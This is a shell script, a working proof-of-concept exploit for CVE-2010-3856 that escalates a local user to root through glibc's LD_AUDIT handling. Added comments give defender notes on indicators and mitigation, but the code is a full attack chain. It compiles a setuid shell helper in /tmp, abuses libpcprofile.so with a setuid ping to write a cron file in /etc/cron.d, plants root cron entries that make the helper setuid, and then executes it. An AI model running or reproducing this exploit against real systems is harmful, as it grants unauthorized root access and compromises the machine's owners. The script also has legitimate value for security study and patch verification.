#!/bin/sh

#
# $Id: raptor_ldaudit,v 1.2 2011/02/04 11:05:15 raptor Exp $
#
# raptor_ldaudit - privilege escalation through glibc ld.so
# Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x 
# before 2.12.2, does not properly restrict use of the LD_AUDIT environment 
# variable to reference dynamic shared objects (DSOs) as audit objects, which 
# allows local users to gain privileges by leveraging an unsafe DSO located in 
# a trusted library directory, as demonstrated by libpcprofile.so 
# (CVE-2010-3856).
#
# "Suit up. Score chicks. Be awesome." -- Barney Stinson
#
# This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben 
# Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344
#
# Other possible attack vectors: /etc/cron.{hourly,daily,weekly,monthly}, at 
# (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d and more...
#
# Usage:
# $ chmod +x raptor_ldaudit
# $ ./raptor_ldaudit
# [...]
# Everything looks fine. Just wait for it... LEGEN-DARY!
# -rwsr-xr-x 1 root users 5707 2010-11-11 14:48 /tmp/pwned
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root),100(users)
# sh-4.1# 
# [don't forget to delete /tmp/pwned*!]
# 
# Vulnerable platforms:
# Slackware 13.1	[tested, weird loop in dillon's cron but it works]
# openSUSE 11.3		[untested]
# Fedora Core 13	[untested]
# RHEL/CentOS 5		[untested]
# Ubuntu 10		[untested]
# [...]
#

# Proof-of-concept for CVE-2010-3856 (see header). Defender notes, derived
# from what the script below visibly does:
#   * Affected versions: glibc before 2.11.3 and 2.12.x before 2.12.2 (per the
#     header); the mitigation is upgrading glibc to a fixed release.
#   * Observable indicators of a run: gcc producing /tmp/pwned from
#     /tmp/pwned.c, a setuid-root binary appearing in /tmp, an unexpected
#     /etc/cron.d/runme entry, and a setuid program (ping) executed with
#     LD_AUDIT and PCPROFILE_OUTPUT in its environment. Auditd rules on
#     writes under /etc/cron.d and on setuid-bit changes in world-writable
#     directories would catch the key steps.
echo "raptor_ldaudit - privilege escalation through glibc ld.so"
echo "Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>"
echo

# prepare setuid shell helper to circumvent bash checks
# The helper drops to uid/gid 0 before spawning /bin/sh; it is compiled here
# (unprivileged) and later given the setuid bit by the cron job below.
# /tmp/pwned.c and /tmp/pwned remain on disk afterwards (the header reminds
# the user to remove them) and are the most durable forensic artifacts.
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c
if [ $? -ne 0 ]; then
	echo "Error: Problems compiling setuid shell helper, check your gcc."
	exit 1
fi

# do the magic!
# $runme is the path the audit object is told to write its profiling output
# to. umask 0 is set so that file is created without any permission bits
# masked off, which is what lets the unprivileged echo lines below overwrite
# it. ping is run with no arguments and stderr discarded: presumably only the
# side effect of ld.so loading libpcprofile.so matters here, not ping itself
# (inferred — ping is assumed to be installed setuid root on the target).
runme="/etc/cron.d/runme"
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null
# If nothing landed in $runme, ld.so honoured the LD_AUDIT restriction (or
# the chosen vector is wrong) and the script stops here.
if [ "`cat $runme 2>/dev/null`" = "" ]; then
	echo "Error: Not vulnerable or wrong attack vector? See comments."
	exit 1
fi

# build the cron script (vixie's crontab)
# The file is truncated and then filled with one entry per cron flavour; each
# entry makes root chown/chmod the helper and then deletes $runme itself, so
# the /etc/cron.d artifact is short-lived. Forensically, cron's own log of
# root running "chown root /tmp/pwned" is the more reliable trace.
echo -n > $runme
echo "* * * * *   root   chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme
# build the cron script (dillon's crontab)
echo "* * * * *   chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme

# legen -- wait for it -- dary!
# Sleeps just over one cron minute so the entry above has had a chance to
# fire, then lists the helper (to show the setuid bit) and executes it.
echo -n "Everything looks fine. Just wait for it... "
sleep 70
echo "LEGEN-DARY!"
ls -l /tmp/pwned
/tmp/pwned
